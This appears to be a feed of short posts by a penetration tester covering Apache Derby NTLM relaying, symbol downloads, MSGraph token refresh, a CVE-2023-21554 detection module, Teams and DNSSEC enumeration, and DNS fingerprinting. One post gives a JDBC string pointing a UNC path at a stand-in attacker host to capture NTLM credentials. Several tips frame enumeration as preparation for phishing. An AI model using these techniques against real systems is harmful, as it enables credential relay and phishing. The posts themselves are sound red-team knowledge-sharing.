| Blog | https://blog.kanbach.org |
| Birdland | https://twitter.com/_bka_ |
| Bluesky | bka-sec.bsky.social |
If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for NTLM relaying.
Example connection string:
jdbc:derby://<target>:1527/\\attacker\foobar;create=false
Downloading symbols for .exe files is easy with tools like symchk, Windbg, IDA or Ghidra. But how to do it manually, for example on Linux with only few tools available?
First we need the UUID of the PDB and its age. We could use objdump for this (screenshot).
The info we are getting from running this command (if .exe was compiled with symbols) is all we need to construct the URL: Name of the PDB (in this example ipconfig.pdb), UUID and age:
Please note that the last digit, 2, behind the UUID corresponds to the age value. That's it, the symbols are going to be downloaded.
Recently I was trying to refresh a MSGraph token to a token for mysignins.microsoft.com, but failed. The original auth code flow uses client_id 19db86c3-b2b9-44cc-b339-36da233a3be2 and scope 0000000c-0000-0000-c000-000000000000%2F.default+openid. Anyone has ideas or experiences?
I tried it using two methods:
1. Calling the /token endpoint with grant_type refresh_token. It gave me error":"invalid_grant"
2. I tried initiating a device code flow using the client_id and scope that I found in the original browser-based auth code flow.
Both didn't work
My new metasploit module to detect the MSMQ RCE CVE-2023-21554, aka QueueJumper, was just published. Thanks to @chompie1337, Fabius Artrel and @aaronportnoy for the excellent write-up covering the vulnerability and the ideas for detecting affected hosts
User Enumeration via Microsoft Teams could be useful during Red Team exercises and in preparation for phishing campaigns. This is described in my recent blog post.
The new tool TeamsEnum could be used to find valid users.
https://securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/
DNSSEC uses resource records like NSEC or NSEC3, which can be leveraged for easier subdomain enumeration.
My recent blog post describes these mechanisms, countermeasures, tools and specific implementations. #osint #redteam #BugBounty #dns #dnssec
https://www.securesystems.de/blog/subdomain-enumeration-with-DNSSEC/
Some nameserver implementations could be fingerprinted by querying the server for RR TXT, Class CH (CHAOS) and name "version.bind". Could be done easily using dig:
dig @<nameserver> -t txt -c CH version.bind
